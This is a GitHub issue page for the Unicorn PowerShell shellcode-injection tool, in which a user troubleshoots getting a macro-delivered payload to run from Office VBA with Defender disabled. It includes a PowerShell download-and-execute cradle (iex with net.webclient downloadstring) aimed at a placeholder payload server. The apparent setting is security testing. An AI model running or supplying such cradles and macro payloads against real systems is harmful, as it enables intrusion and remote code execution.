search

trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com
Other
3.74k stars 817 forks source link

Formatting troubles with Word/Excel VBA editor #147

Closed 07am closed 4 years ago

07am commented 4 years ago

Hello, I'm using Office 2016 Plus to create my macro-enabled docs and I seem to be having trouble formatting the script block to run.

I've noticed the editor automatically tries to add in double quotes not present in the source. Immediately after "...as unicorn second stage" and another section " actual unicorn payload".

I've tried escaping around the text or truncating unnecessary stuff and I got it to produce the -219 error block but no callback.

payload and infrastructure is verified correct. defender is turned off for this portion of the test.

Anyone have a workaround or ideas for this?

Screenshot from 2020-06-16 20-29-01 Screenshot from 2020-06-16 20-29-44

07am commented 4 years ago

Digging deeper, I've tried just running the decoded version in powershell and it seems to be kicking back the error "Cannot process the XML from the "Error" stream of : Root element is missing.

I've also tried replacing the obfuscated powershell commands with a simple iex(new-object net.webclient).downloadstring('blahblah') and got the macro to fire and hit my payload server (though it didn't produce a shell, nor did defender go off.) decoded-run Screenshot from 2020-06-16 22-52-30